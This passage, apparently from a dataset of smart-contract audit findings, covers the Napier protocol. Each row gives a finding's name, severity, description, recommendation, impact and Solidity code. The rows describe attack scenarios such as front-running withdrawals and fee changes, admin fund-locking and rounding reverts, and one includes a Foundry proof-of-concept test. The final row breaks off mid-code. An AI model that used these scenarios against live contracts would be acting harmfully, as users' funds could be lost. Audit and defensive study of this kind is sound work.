name
stringlengths
5
231
severity
stringclasses
3 values
description
stringlengths
107
68.2k
recommendation
stringlengths
12
8.75k
impact
stringlengths
3
11.2k
function
stringlengths
15
64.6k
Permissioned rebalancing functions leading to loss of assets
medium
Permissioned rebalancing functions that could only be accessed by admin could lead to a loss of assets.\\nPer the contest's README page, it stated that the admin/owner is "RESTRICTED". Thus, any finding showing that the owner/admin can steal a user's funds, cause loss of funds or harm to the users, or cause the user's fund to be struck is valid in this audit contest.\\nQ: Is the admin/owner of the protocol/contracts TRUSTED or RESTRICTED?\\nRESTRICTED\\nThe following describes a way where the admin can block users from withdrawing their assets from the protocol\\nThe admin calls the `setRebalancer` function to set the rebalance to a wallet address owned by them.\\n```\\nFile: BaseLSTAdapter.sol\\n function setRebalancer(address _rebalancer) external onlyOwner {\\n rebalancer = _rebalancer;\\n }\\n```\\n\\nThe admin calls the `setTargetBufferPercentage` the set the `targetBufferPercentage` to the smallest possible value of 1%. This will cause only 1% of the total ETH deposited by all the users to reside on the adaptor contract. This will cause the ETH buffer to deplete quickly and cause all the redemption and withdrawal to revert.\\n```\\nFile: BaseLSTAdapter.sol\\n function setTargetBufferPercentage(uint256 _targetBufferPercentage) external onlyRebalancer {\\n if (_targetBufferPercentage < MIN_BUFFER_PERCENTAGE || _targetBufferPercentage > BUFFER_PERCENTAGE_PRECISION) {\\n revert InvalidBufferPercentage();\\n }\\n targetBufferPercentage = _targetBufferPercentage;\\n }\\n```\\n\\nThe owner calls the `setRebalancer` function again and sets the rebalancer address to `address(0)`. As such, no one has the ability to call functions that are only accessible by rebalancer. The `requestWithdrawal` and `requestWithdrawalAll` functions are only accessible by rebalancer. Thus, no one can call these two functions to replenish the ETH buffer in the adaptor contract.\\nWhen this state is reached, users can no longer withdraw their assets from the protocol, and their assets are stuck in the contract. This effectively causes them to lose their assets.
To prevent the above scenario, the minimum `targetBufferPercentage` should be set to a higher percentage such as 5 or 10%, and the `requestWithdrawal` function should be made permissionless, so that even if the rebalancer does not do its job, anyone else can still initiate the rebalancing process to replenish the adaptor's ETH buffer for user's withdrawal.
Loss of assets for the victim.
```\\nFile: BaseLSTAdapter.sol\\n function setRebalancer(address _rebalancer) external onlyOwner {\\n rebalancer = _rebalancer;\\n }\\n```\\n
Unable to deposit to Tranche/Adaptor under certain conditions
medium
Minting of PT and YT is the core feature of the protocol. Without the ability to mint PT and YT, the protocol would not operate.\\nThe user cannot deposit into the Tranche to issue new PT + YT under certain conditions.\\nThe comment in Line 133 below mentioned that the `stakeAmount` can be zero.\\nThe reason is that when `targetBufferEth < (availableEth + queueEthCache)`, it is possible that there is a pending withdrawal request (queueEthCache) and no available ETH left in the buffer (availableEth = 0). Refer to the comment in Line 123 below.\\nAs a result, the code at Line 127 below will restrict the amount of ETH to be staked and set the `stakeAmount` to zero.\\n```\\nFile: BaseLSTAdapter.sol\\n function prefundedDeposit() external nonReentrant returns (uint256, uint256) {\\n..SNIP..\\n uint256 stakeAmount;\\n unchecked {\\n stakeAmount = availableEth + queueEthCache - targetBufferEth; // non-zero, no underflow\\n }\\n // If the stake amount exceeds 95% of the available ETH, cap the stake amount.\\n // This is to prevent the buffer from being completely drained. This is not a complete solution.\\n //\\n // The condition: stakeAmount > availableEth, is equivalent to: queueEthCache > targetBufferEth\\n // Possible scenarios:\\n // - Target buffer percentage was changed to a lower value and there is a large withdrawal request pending.\\n // - There is a pending withdrawal request and the available ETH are not left in the buffer.\\n // - There is no pending withdrawal request and the available ETH are not left in the buffer.\\n uint256 maxStakeAmount = (availableEth * 95) / 100;\\n if (stakeAmount > maxStakeAmount) {\\n stakeAmount = maxStakeAmount; // max 95% of the available ETH\\n }\\n\\n /// INTERACT ///\\n // Deposit into the yield source\\n // Actual amount of ETH spent may be less than the requested amount.\\n stakeAmount = _stake(stakeAmount); // stake amount can be 0\\n```\\n\\nHowever, the issue is that when `_stake` function is called with `stakeAmount` set to zero, it will result in zero ETH being staked and Line 77 below will revert.\\n```\\nFile: StEtherAdapter.sol\\n /// @inheritdoc BaseLSTAdapter\\n /// @dev Lido has a limit on the amount of ETH that can be staked.\\n /// @dev Need to check the current staking limit before staking to prevent DoS.\\n function _stake(uint256 stakeAmount) internal override returns (uint256) {\\n uint256 stakeLimit = STETH.getCurrentStakeLimit();\\n if (stakeAmount > stakeLimit) {\\n // Cap stake amount\\n stakeAmount = stakeLimit;\\n }\\n\\n IWETH9(Constants.WETH).withdraw(stakeAmount);\\n uint256 _stETHAmt = STETH.submit{value: stakeAmount}(address(this));\\n\\n if (_stETHAmt == 0) revert InvariantViolation();\\n return stakeAmount;\\n }\\n```\\n\\nA similar issue also occurs for the sFRXETH adaptor. If `FRXETH_MINTER.submit` function is called with `stakeAmount == 0`, it will revert.\\n```\\nFile: SFrxETHAdapter.sol\\n /// @notice Mint sfrxETH using WETH\\n function _stake(uint256 stakeAmount) internal override returns (uint256) {\\n IWETH9(Constants.WETH).withdraw(stakeAmount);\\n FRXETH_MINTER.submit{value: stakeAmount}();\\n uint256 received = STAKED_FRXETH.deposit(stakeAmount, address(this));\\n if (received == 0) revert InvariantViolation();\\n\\n return stakeAmount;\\n }\\n```\\n\\nThe following shows that the `FRXETH_MINTER.submit` function will revert if submitted ETH is zero below.\\n```\\n/// @notice Mint frxETH to the recipient using sender's funds. Internal portion\\nfunction _submit(address recipient) internal nonReentrant {\\n // Initial pause and value checks\\n require(!submitPaused, "Submit is paused");\\n require(msg.value != 0, "Cannot submit 0");\\n```\\n
Short-circuit the `_stake` function by returning zero value immediately if the `stakeAmount` is zero.\\nFile: StEtherAdapter.sol\\n```\\nfunction _stake(uint256 stakeAmount) internal override returns (uint256) {\\n// Add the line below\\n if (stakeAmount == 0) return 0; \\n uint256 stakeLimit = STETH.getCurrentStakeLimit();\\n if (stakeAmount > stakeLimit) {\\n // Cap stake amount\\n stakeAmount = stakeLimit;\\n }\\n\\n IWETH9(Constants.WETH).withdraw(stakeAmount);\\n uint256 _stETHAmt = STETH.submit{value: stakeAmount}(address(this));\\n\\n if (_stETHAmt == 0) revert InvariantViolation();\\n return stakeAmount;\\n}\\n```\\n\\nFile: SFrxETHAdapter.sol\\n```\\nfunction _stake(uint256 stakeAmount) internal override returns (uint256) {\\n// Add the line below\\n if (stakeAmount == 0) return 0; \\n IWETH9(Constants.WETH).withdraw(stakeAmount);\\n FRXETH_MINTER.submit{value: stakeAmount}();\\n uint256 received = STAKED_FRXETH.deposit(stakeAmount, address(this));\\n if (received == 0) revert InvariantViolation();\\n\\n return stakeAmount;\\n}\\n```\\n
Minting of PT and YT is the core feature of the protocol. Without the ability to mint PT and YT, the protocol would not operate. The user cannot deposit into the Tranche to issue new PT + YT under certain conditions. Breaking of core protocol/contract functionality.
```\\nFile: BaseLSTAdapter.sol\\n function prefundedDeposit() external nonReentrant returns (uint256, uint256) {\\n..SNIP..\\n uint256 stakeAmount;\\n unchecked {\\n stakeAmount = availableEth + queueEthCache - targetBufferEth; // non-zero, no underflow\\n }\\n // If the stake amount exceeds 95% of the available ETH, cap the stake amount.\\n // This is to prevent the buffer from being completely drained. This is not a complete solution.\\n //\\n // The condition: stakeAmount > availableEth, is equivalent to: queueEthCache > targetBufferEth\\n // Possible scenarios:\\n // - Target buffer percentage was changed to a lower value and there is a large withdrawal request pending.\\n // - There is a pending withdrawal request and the available ETH are not left in the buffer.\\n // - There is no pending withdrawal request and the available ETH are not left in the buffer.\\n uint256 maxStakeAmount = (availableEth * 95) / 100;\\n if (stakeAmount > maxStakeAmount) {\\n stakeAmount = maxStakeAmount; // max 95% of the available ETH\\n }\\n\\n /// INTERACT ///\\n // Deposit into the yield source\\n // Actual amount of ETH spent may be less than the requested amount.\\n stakeAmount = _stake(stakeAmount); // stake amount can be 0\\n```\\n
Napier pool owner can unfairly increase protocol fees on swaps to earn more revenue
medium
Currently there is no limit to how often a `poolOwner` can update fees which can be abused to earn more fees by charging users higher swap fees than they expect.\\nThe `NapierPool::setFeeParameter` function allows the `poolOwner` to set the `protocolFeePercent` at any point to a maximum value of 100%. The `poolOwner` is a trusted party but should not be able to abuse protocol settings to earn more revenue. There are no limits to how often this can be updated.\\n```\\n function test_protocol_owner_frontRuns_swaps_with_higher_fees() public whenMaturityNotPassed {\\n // pre-condition\\n vm.warp(maturity - 30 days);\\n deal(address(pts[0]), alice, type(uint96).max, false); // ensure alice has enough pt\\n uint256 preBaseLptSupply = tricrypto.totalSupply();\\n uint256 ptInDesired = 100 * ONE_UNDERLYING;\\n uint256 expectedBaseLptIssued = tricrypto.calc_token_amount([ptInDesired, 0, 0], true);\\n\\n // Pool owner sees swap about to occur and front runs updating fees to max value\\n vm.startPrank(owner);\\n pool.setFeeParameter("protocolFeePercent", 100);\\n vm.stopPrank();\\n\\n // execute\\n vm.prank(alice);\\n uint256 underlyingOut = pool.swapPtForUnderlying(\\n 0, ptInDesired, recipient, abi.encode(CallbackInputType.SwapPtForUnderlying, SwapInput(underlying, pts[0]))\\n );\\n // sanity check\\n uint256 protocolFee = SwapEventsLib.getProtocolFeeFromLastSwapEvent(pool);\\n assertGt(protocolFee, 0, "fee should be charged");\\n }\\n```\\n
Introduce a delay in fee updates to ensure users receive the fees they expect.
A malicious `poolOwner` could change the protocol swap fees unfairly for users by front-running swaps and increasing fees to higher values on unsuspecting users. An example scenario is:\\nThe `poolOwner` sets swap fees to 1% to attract users\\nThe `poolOwner` front runs all swaps and changes the swap fees to the maximum value of 100%\\nAfter the swap the `poolOwner` resets `protocolFeePercent` to a low value to attract more users
```\\n function test_protocol_owner_frontRuns_swaps_with_higher_fees() public whenMaturityNotPassed {\\n // pre-condition\\n vm.warp(maturity - 30 days);\\n deal(address(pts[0]), alice, type(uint96).max, false); // ensure alice has enough pt\\n uint256 preBaseLptSupply = tricrypto.totalSupply();\\n uint256 ptInDesired = 100 * ONE_UNDERLYING;\\n uint256 expectedBaseLptIssued = tricrypto.calc_token_amount([ptInDesired, 0, 0], true);\\n\\n // Pool owner sees swap about to occur and front runs updating fees to max value\\n vm.startPrank(owner);\\n pool.setFeeParameter("protocolFeePercent", 100);\\n vm.stopPrank();\\n\\n // execute\\n vm.prank(alice);\\n uint256 underlyingOut = pool.swapPtForUnderlying(\\n 0, ptInDesired, recipient, abi.encode(CallbackInputType.SwapPtForUnderlying, SwapInput(underlying, pts[0]))\\n );\\n // sanity check\\n uint256 protocolFee = SwapEventsLib.getProtocolFeeFromLastSwapEvent(pool);\\n assertGt(protocolFee, 0, "fee should be charged");\\n }\\n```\\n
Benign esfrxETH holders incur more loss than expected
medium
Malicious esfrxETH holders can avoid "pro-rated" loss and have the remaining esfrxETH holders incur all the loss due to the fee charged by FRAX during unstaking. As a result, the rest of the esfrxETH holders incur more losses than expected compared to if malicious esfrxETH holders had not used this trick in the first place.\\n```\\nFile: SFrxETHAdapter.sol\\n/// @title SFrxETHAdapter - esfrxETH\\n/// @dev Important security note:\\n/// 1. The vault share price (esfrxETH / WETH) increases as sfrxETH accrues staking rewards.\\n/// However, the share price decreases when frxETH (sfrxETH) is withdrawn.\\n/// Withdrawals are processed by the FraxEther redemption queue contract.\\n/// Frax takes a fee at the time of withdrawal requests, which temporarily reduces the share price.\\n/// This loss is pro-rated among all esfrxETH holders.\\n/// As a mitigation measure, we allow only authorized rebalancers to request withdrawals.\\n///\\n/// 2. This contract doesn't independently keep track of the sfrxETH balance, so it is possible\\n/// for an attacker to directly transfer sfrxETH to this contract, increase the share price.\\ncontract SFrxETHAdapter is BaseLSTAdapter, IERC721Receiver {\\n```\\n\\nIn the SFrxETHAdapter's comments above, it is stated that the share price will decrease due to the fee taken by FRAX during the withdrawal request. This loss is supposed to be 'pro-rated' among all esfrxETH holders. However, this report reveals that malicious esfrxETH holders can circumvent this 'pro-rated' loss, leaving the remaining esfrxETH holders to bear the entire loss. Furthermore, the report demonstrates that the current mitigation measure, which allows only authorized rebalancers to request withdrawals, is insufficient to prevent this exploitation.\\nWhenever a rebalancers submit a withdrawal request to withdraw staked ETH from FRAX, it will first reside in the mempool of the blockchain and anyone can see it. Malicious esfrxETH holders can front-run it to withdraw their shares from the adaptor.\\nWhen the withdrawal request TX is executed, the remaining esfrxETH holders in the adaptor will incur the fee. Once executed, the malicious esfrxETH deposits back to the adaptors.\\nNote that no fee is charged to the users for any deposit or withdrawal operation. Thus, as long as the gain from this action is more than the gas cost, it makes sense for the esfrxETH holders to do so.
The best way to discourage users from withdrawing their assets and depositing them back to take advantage of a particular event is to impose a fee upon depositing and withdrawing.
The rest of the esfrxETH holders incur more losses than expected compared to if malicious esfrxETH holders had not used this trick in the first place.
```\\nFile: SFrxETHAdapter.sol\\n/// @title SFrxETHAdapter - esfrxETH\\n/// @dev Important security note:\\n/// 1. The vault share price (esfrxETH / WETH) increases as sfrxETH accrues staking rewards.\\n/// However, the share price decreases when frxETH (sfrxETH) is withdrawn.\\n/// Withdrawals are processed by the FraxEther redemption queue contract.\\n/// Frax takes a fee at the time of withdrawal requests, which temporarily reduces the share price.\\n/// This loss is pro-rated among all esfrxETH holders.\\n/// As a mitigation measure, we allow only authorized rebalancers to request withdrawals.\\n///\\n/// 2. This contract doesn't independently keep track of the sfrxETH balance, so it is possible\\n/// for an attacker to directly transfer sfrxETH to this contract, increase the share price.\\ncontract SFrxETHAdapter is BaseLSTAdapter, IERC721Receiver {\\n```\\n
Lack of slippage control for `issue` function
medium
The lack of slippage control for `issue` function can lead to a loss of assets for the affected users.\\nDuring the issuance, the user will deposit underlying assets (e.g., ETH) to the Tranche contract, and the Tranche contract will forward them to the Adaptor contract for depositing at Line 208 below. The number of shares minted is depending on the current scale of the adaptor. The current scale of the adaptor can increase or decrease at any time, depending on the current on-chain condition when the transaction is executed. For instance, the LIDO's daily oracle/rebase update will increase the stETH balance, which will, in turn, increase the adaptor's scale. On the other hand, if there is a mass validator slashing event, the ETH claimed from the withdrawal queue will be less than expected, leading to a decrease in the adaptor's scale. Thus, one cannot ensure the result from the off-chain simulation will be the same as the on-chain execution.\\nHaving said that, the number of shared minted will vary (larger or smaller than expected) if there is a change in the current scale. Assuming that Alice determined off-chain that depositing 100 ETH would issue $x$ amount of PT/YT. When she executes the TX, the scale increases, leading to the amount of PT/YT issued being less than $x$. The slippage is more than what she can accept.\\nIn summary, the `issue` function lacks the slippage control that allows the users to revert if the amount of PT/YT they received is less than the amount they expected.\\n```\\nFile: Tranche.sol\\n function issue(\\n address to,\\n uint256 underlyingAmount\\n ) external nonReentrant whenNotPaused notExpired returns (uint256 issued) {\\n..SNIP..\\n // Transfer underlying from user to adapter and deposit it into adapter to get target token\\n _underlying.safeTransferFrom(msg.sender, address(adapter), underlyingAmount);\\n (, uint256 sharesMinted) = adapter.prefundedDeposit();\\n\\n // Deduct the issuance fee from the amount of target token minted + reinvested yield\\n // Fee should be rounded up towards the protocol (against the user) so that issued principal is rounded down\\n // Hackmd: F0\\n // ptIssued\\n // = (u/s + y - fee) * S\\n // = (sharesUsed - fee) * S\\n // where u = underlyingAmount, s = current scale, y = reinvested yield, S = maxscale\\n uint256 sharesUsed = sharesMinted + accruedInTarget;\\n uint256 fee = sharesUsed.mulDivUp(issuanceFeeBps, MAX_BPS);\\n issued = (sharesUsed - fee).mulWadDown(_maxscale);\\n\\n // Accumulate issueance fee in units of target token\\n issuanceFees += fee;\\n // Mint PT and YT to user\\n _mint(to, issued);\\n _yt.mint(to, issued);\\n\\n emit Issue(msg.sender, to, issued, sharesUsed);\\n }\\n\\n```\\n
Implement a slippage control that allows the users to revert if the amount of PT/YT they received is less than the amount they expected.
Loss of assets for the affected users.
```\\nFile: Tranche.sol\\n function issue(\\n address to,\\n uint256 underlyingAmount\\n ) external nonReentrant whenNotPaused notExpired returns (uint256 issued) {\\n..SNIP..\\n // Transfer underlying from user to adapter and deposit it into adapter to get target token\\n _underlying.safeTransferFrom(msg.sender, address(adapter), underlyingAmount);\\n (, uint256 sharesMinted) = adapter.prefundedDeposit();\\n\\n // Deduct the issuance fee from the amount of target token minted + reinvested yield\\n // Fee should be rounded up towards the protocol (against the user) so that issued principal is rounded down\\n // Hackmd: F0\\n // ptIssued\\n // = (u/s + y - fee) * S\\n // = (sharesUsed - fee) * S\\n // where u = underlyingAmount, s = current scale, y = reinvested yield, S = maxscale\\n uint256 sharesUsed = sharesMinted + accruedInTarget;\\n uint256 fee = sharesUsed.mulDivUp(issuanceFeeBps, MAX_BPS);\\n issued = (sharesUsed - fee).mulWadDown(_maxscale);\\n\\n // Accumulate issueance fee in units of target token\\n issuanceFees += fee;\\n // Mint PT and YT to user\\n _mint(to, issued);\\n _yt.mint(to, issued);\\n\\n emit Issue(msg.sender, to, issued, sharesUsed);\\n }\\n\\n```\\n
Users unable to withdraw their funds due to FRAX admin action
medium
FRAX admin action can lead to the fund of Naiper protocol and its users being stuck, resulting in users being unable to withdraw their assets.\\nPer the contest page, the admins of the protocols that Napier integrates with are considered "RESTRICTED". This means that any issue related to FRAX's admin action that could negatively affect Napier protocol/users will be considered valid in this audit contest.\\nQ: Are the admins of the protocols your contracts integrate with (if any) TRUSTED or RESTRICTED? RESTRICTED\\nWhen the Adaptor needs to unstake its staked ETH to replenish its ETH buffer so that users can redeem/withdraw their funds, it will first join the FRAX's redemption queue, and the queue will issue a redemption NFT afterward. After a certain period, the adaptor can claim their ETH by burning the redemption NFT at Line 65 via the `burnRedemptionTicketNft` function.\\n```\\nFile: SFrxETHAdapter.sol\\n function claimWithdrawal() external override {\\n uint256 _requestId = requestId;\\n uint256 _withdrawalQueueEth = withdrawalQueueEth;\\n if (_requestId == 0) revert NoPendingWithdrawal();\\n\\n /// WRITE ///\\n delete withdrawalQueueEth;\\n delete requestId;\\n bufferEth += _withdrawalQueueEth.toUint128();\\n\\n /// INTERACT ///\\n uint256 balanceBefore = address(this).balance;\\n REDEMPTION_QUEUE.burnRedemptionTicketNft(_requestId, payable(this));\\n if (address(this).balance < balanceBefore + _withdrawalQueueEth) revert InvariantViolation();\\n\\n IWETH9(Constants.WETH).deposit{value: _withdrawalQueueEth}();\\n }\\n```\\n\\nHowever, it is possible for FRAX's admin to disrupt the redemption process of the adaptor, resulting in Napier users being unable to withdraw their funds. When the `burnRedemptionTicketNft` function is executed, the redemption NFT will be burned, and native ETH residing in the `FraxEtherRedemptionQueue` contract will be sent to the adaptor at Line 498 below\\n```\\nFile: FraxEtherRedemptionQueue.sol\\n function burnRedemptionTicketNft(uint256 _nftId, address payable _recipient) external nonReentrant {\\n..SNIP..\\n // Effects: Burn frxEth to match the amount of ether sent to user 1:1\\n FRX_ETH.burn(_redemptionQueueItem.amount);\\n\\n // Interactions: Transfer ETH to recipient, minus the fee\\n (bool _success, ) = _recipient.call{ value: _redemptionQueueItem.amount }("");\\n if (!_success) revert InvalidEthTransfer();\\n```\\n\\nFRAX admin could execute the `recoverEther` function to transfer out all the Native ETH residing in the `FraxEtherRedemptionQueue` contract, resulting in the NFT redemption failing due to lack of ETH.\\n```\\nFile: FraxEtherRedemptionQueue.sol\\n /// @notice Recover ETH from exits where people early exited their NFT for frxETH, or when someone mistakenly directly sends ETH here\\n /// @param _amount Amount of ETH to recover\\n function recoverEther(uint256 _amount) external {\\n _requireSenderIsTimelock();\\n\\n (bool _success, ) = address(msg.sender).call{ value: _amount }("");\\n if (!_success) revert InvalidEthTransfer();\\n\\n emit RecoverEther({ recipient: msg.sender, amount: _amount });\\n }\\n```\\n\\nAs a result, Napier users will not be able to withdraw their funds.
Ensure that the protocol team and its users are aware of the risks of such an event and develop a contingency plan to manage it.
The fund of Naiper protocol and its users will be stuck, resulting in users being unable to withdraw their assets.
```\\nFile: SFrxETHAdapter.sol\\n function claimWithdrawal() external override {\\n uint256 _requestId = requestId;\\n uint256 _withdrawalQueueEth = withdrawalQueueEth;\\n if (_requestId == 0) revert NoPendingWithdrawal();\\n\\n /// WRITE ///\\n delete withdrawalQueueEth;\\n delete requestId;\\n bufferEth += _withdrawalQueueEth.toUint128();\\n\\n /// INTERACT ///\\n uint256 balanceBefore = address(this).balance;\\n REDEMPTION_QUEUE.burnRedemptionTicketNft(_requestId, payable(this));\\n if (address(this).balance < balanceBefore + _withdrawalQueueEth) revert InvariantViolation();\\n\\n IWETH9(Constants.WETH).deposit{value: _withdrawalQueueEth}();\\n }\\n```\\n
Users are unable to collect their yield if tranche is paused
medium
Users are unable to collect their yield if Tranche is paused, resulting in a loss of assets for the victims.\\nPer the contest's README page, it stated that the admin/owner is "RESTRICTED". Thus, any finding showing that the owner/admin can steal a user's funds, cause loss of funds or harm to the users, or cause the user's fund to be struck is valid in this audit contest.\\nQ: Is the admin/owner of the protocol/contracts TRUSTED or RESTRICTED?\\nRESTRICTED\\nThe admin of the protocol has the ability to pause the Tranche contract, and no one except for the admin can unpause it. If a malicious admin paused the Tranche contract, the users will not be able to collect their yield earned, leading to a loss of assets for them.\\n```\\nFile: Tranche.sol\\n /// @notice Pause issue, collect and updateUnclaimedYield\\n /// @dev only callable by management\\n function pause() external onlyManagement {\\n _pause();\\n }\\n\\n /// @notice Unpause issue, collect and updateUnclaimedYield\\n /// @dev only callable by management\\n function unpause() external onlyManagement {\\n _unpause();\\n }\\n```\\n\\nThe following shows that the `collect` function can only be executed when the system is not paused.\\n```\\nFile: Tranche.sol\\n function collect() public nonReentrant whenNotPaused returns (uint256) {\\n uint256 _lscale = lscales[msg.sender];\\n uint256 accruedInTarget = unclaimedYields[msg.sender];\\n```\\n
Consider allowing the users to collect yield even when the system is paused.
Users are unable to collect their yield if Tranche is paused, resulting in a loss of assets for the victims.
```\\nFile: Tranche.sol\\n /// @notice Pause issue, collect and updateUnclaimedYield\\n /// @dev only callable by management\\n function pause() external onlyManagement {\\n _pause();\\n }\\n\\n /// @notice Unpause issue, collect and updateUnclaimedYield\\n /// @dev only callable by management\\n function unpause() external onlyManagement {\\n _unpause();\\n }\\n```\\n
`swapUnderlyingForYt` revert due to rounding issues
medium
The core function (swapUnderlyingForYt) of the Router will revert due to rounding issues. Users who intend to swap underlying assets to YT tokens via the Router will be unable to do so.\\nThe `swapUnderlyingForYt` allows users to swap underlying assets to a specific number of YT tokens they desire.\\n```\\nFile: NapierRouter.sol\\n function swapUnderlyingForYt(\\n address pool,\\n uint256 index,\\n uint256 ytOutDesired,\\n uint256 underlyingInMax,\\n address recipient,\\n uint256 deadline\\n ) external payable override nonReentrant checkDeadline(deadline) returns (uint256) {\\n..SNIP..\\n // Variable Definitions:\\n // - `uDeposit`: The amount of underlying asset that needs to be deposited to issue PT and YT.\\n // - `ytOutDesired`: The desired amount of PT and YT to be issued.\\n // - `cscale`: Current scale of the Tranche.\\n // - `maxscale`: Maximum scale of the Tranche (denoted as 'S' in the formula).\\n // - `issuanceFee`: Issuance fee in basis points. (10000 =100%).\\n\\n // Formula for `Tranche.issue`:\\n // ```\\n // shares = uDeposit / s\\n // fee = shares * issuanceFeeBps / 10000\\n // pyIssue = (shares - fee) * S\\n // ```\\n\\n // Solving for `uDeposit`:\\n // ```\\n // uDeposit = (pyIssue * s / S) / (1 - issuanceFeeBps / 10000)\\n // ```\\n // Hack:\\n // Buffer is added to the denominator.\\n // This ensures that at least `ytOutDesired` amount of PT and YT are issued.\\n // If maximum scale and current scale are significantly different or `ytOutDesired` is small, the function might fail.\\n // Without this buffer, any rounding errors that reduce the issued PT and YT could lead to an insufficient amount of PT to be repaid to the pool.\\n uint256 uDepositNoFee = cscale * ytOutDesired / maxscale;\\n uDeposit = uDepositNoFee * MAX_BPS / (MAX_BPS - (series.issuanceFee + 1)); // 0.01 bps buffer\\n```\\n\\nLine 353-354 above compute the number of underlying deposits needed to send to the Tranche to issue the amount of YT token the users desired. It attempts to add a buffer of 0.01 bps buffer to prevent rounding errors that could lead to insufficient PT being repaid to the pool and result in a revert. During the audit, it was found that this buffer is ineffective in achieving its purpose.\\nThe following example/POC demonstrates a revert could still occur due to insufficient PT being repaid despite having a buffer:\\nLet the state be the following:\\ncscale = 1.2e18\\nmaxScale = 1.25e18\\nytOutDesired = 123\\nissuanceFee = 0% (For simplicity's sake, the fee is set to zero. Having fee or not does not affect the validity of this issue as this is a math problem)\\nThe following computes the number of underlying assets to be transferred to the Tranche to mint/issue PY + YT\\n```\\nuDepositNoFee = cscale * ytOutDesired / maxscale;\\nuDepositNoFee = 1.2e18 * 123 / 1.25e18 = 118.08 = 118 (Round down)\\n\\nuDeposit = uDepositNoFee * MAX_BPS / (MAX_BPS - (series.issuanceFee + 1))\\nuDeposit = 118 * 10000 / (10000 - (0 + 1)) = 118.0118012 = 118 (Round down)\\n```\\n\\nSubsequently, the code will perform a flash-swap via the `swapPtForUnderlying` function. It will borrow 123 PT from the pool, which must be repaid later.\\nIn the swap callback function, the code will transfer 118 underlying assets to the Tranche and execute the `Tranche.issue` function to mint/issue PY + YT.\\nWithin the `Tranche.issue` function, it will trigger the `adapter.prefundedDeposit()` function to mint the estETH/shares. The following is the number of estETH/shares minted:\\n```\\nshares = assets * (total supply/total assets)\\nsahres = 118 * 100e18 / 120e18 = 98.33333333 = 98 shares\\n```\\n\\nNext, Line 219 below of the `Tranche.issue` function will compute the number of PY+YT to be issued/minted\\n```\\nissued = (sharesUsed - fee).mulWadDown(_maxscale);\\nissued = (sharesUsed - 0).mulWadDown(_maxscale);\\nissued = sharesUsed.mulWadDown(_maxscale);\\n\\nissued = sharesUsed * _maxscale / WAD\\nissued = 98 * 1.25e18 / 1e18 = 122.5 = 122 PT (Round down)\\n```\\n\\n```\\nFile: Tranche.sol\\n function issue(\\n address to,\\n uint256 underlyingAmount\\n ) external nonReentrant whenNotPaused notExpired returns (uint256 issued) {\\n..SNIP..\\n uint256 sharesUsed = sharesMinted + accruedInTarget;\\n uint256 fee = sharesUsed.mulDivUp(issuanceFeeBps, MAX_BPS);\\n issued = (sharesUsed - fee).mulWadDown(_maxscale);\\n```\\n\\nAt the end of the `Tranche.issue` function, 122 PY + YT is issued/minted back to the Router.\\nNote that 123 PT was flash-loaned earlier, and 123 PT needs to be repaid. Otherwise, the code at Line 164 below will revert. The main problem is that only 122 PY was issued/minted (a shortfall of 1 PY). Thus, the swap TX will revert at the end.\\n```\\nFile: NapierRouter.sol\\n function swapCallback(int256 underlyingDelta, int256 ptDelta, bytes calldata data) external override {\\n..SNIP..\\n uint256 pyIssued = params.pt.issue({to: address(this), underlyingAmount: params.underlyingDeposit});\\n\\n // Repay the PT to Napier pool\\n if (pyIssued < pyDesired) revert Errors.RouterInsufficientPtRepay();\\n```\\n
The buffer does not appear to be the correct approach to manage this rounding error. One could increase the buffer from 0.01% to 1% and solve the issue in the above example, but a different or larger number might cause a rounding error to surface again. Also, a larger buffer means that many unnecessary PTs will be issued.\\nThus, it is recommended that a round-up division be performed when computing the `uDepositNoFee` and `uDeposit` using functions such as `divWadUp` so that the issued/minted PT can cover the debt.
The core function (swapUnderlyingForYt) of the Router will break. Users who intend to swap underlying assets to YT tokens via the Router will not be able to do so.
```\\nFile: NapierRouter.sol\\n function swapUnderlyingForYt(\\n address pool,\\n uint256 index,\\n uint256 ytOutDesired,\\n uint256 underlyingInMax,\\n address recipient,\\n uint256 deadline\\n ) external payable override nonReentrant checkDeadline(deadline) returns (uint256) {\\n..SNIP..\\n // Variable Definitions:\\n // - `uDeposit`: The amount of underlying asset that needs to be deposited to issue PT and YT.\\n // - `ytOutDesired`: The desired amount of PT and YT to be issued.\\n // - `cscale`: Current scale of the Tranche.\\n // - `maxscale`: Maximum scale of the Tranche (denoted as 'S' in the formula).\\n // - `issuanceFee`: Issuance fee in basis points. (10000 =100%).\\n\\n // Formula for `Tranche.issue`:\\n // ```\\n // shares = uDeposit / s\\n // fee = shares * issuanceFeeBps / 10000\\n // pyIssue = (shares - fee) * S\\n // ```\\n\\n // Solving for `uDeposit`:\\n // ```\\n // uDeposit = (pyIssue * s / S) / (1 - issuanceFeeBps / 10000)\\n // ```\\n // Hack:\\n // Buffer is added to the denominator.\\n // This ensures that at least `ytOutDesired` amount of PT and YT are issued.\\n // If maximum scale and current scale are significantly different or `ytOutDesired` is small, the function might fail.\\n // Without this buffer, any rounding errors that reduce the issued PT and YT could lead to an insufficient amount of PT to be repaid to the pool.\\n uint256 uDepositNoFee = cscale * ytOutDesired / maxscale;\\n uDeposit = uDepositNoFee * MAX_BPS / (MAX_BPS - (series.issuanceFee + 1)); // 0.01 bps buffer\\n```\\n
FRAX admin can adjust fee rate to harm Napier and its users
medium
FRAX admin can adjust fee rates to harm Napier and its users, preventing Napier users from withdrawing.\\nPer the contest page, the admins of the protocols that Napier integrates with are considered "RESTRICTED". This means that any issue related to FRAX's admin action that could negatively affect Napier protocol/users will be considered valid in this audit contest.\\nQ: Are the admins of the protocols your contracts integrate with (if any) TRUSTED or RESTRICTED? RESTRICTED\\nFollowing is one of the ways that FRAX admin can harm Napier and its users.\\nFRAX admin can set the fee to 100%.\\n```\\nFile: FraxEtherRedemptionQueue.sol\\n /// @notice Sets the fee for redeeming\\n /// @param _newFee New redemption fee given in percentage terms, using 1e6 precision\\n function setRedemptionFee(uint64 _newFee) external {\\n _requireSenderIsTimelock();\\n if (_newFee > FEE_PRECISION) revert ExceedsMaxRedemptionFee(_newFee, FEE_PRECISION);\\n\\n emit SetRedemptionFee({ oldRedemptionFee: redemptionQueueState.redemptionFee, newRedemptionFee: _newFee });\\n\\n redemptionQueueState.redemptionFee = _newFee;\\n }\\n```\\n\\nWhen the adaptor attempts to redeem the staked ETH from FRAX via the `enterRedemptionQueue` function, the 100% fee will consume the entire amount of the staked fee, leaving nothing for Napier's adaptor.\\n```\\nFile: FraxEtherRedemptionQueue.sol\\n function enterRedemptionQueue(address _recipient, uint120 _amountToRedeem) public nonReentrant {\\n // Get queue information\\n RedemptionQueueState memory _redemptionQueueState = 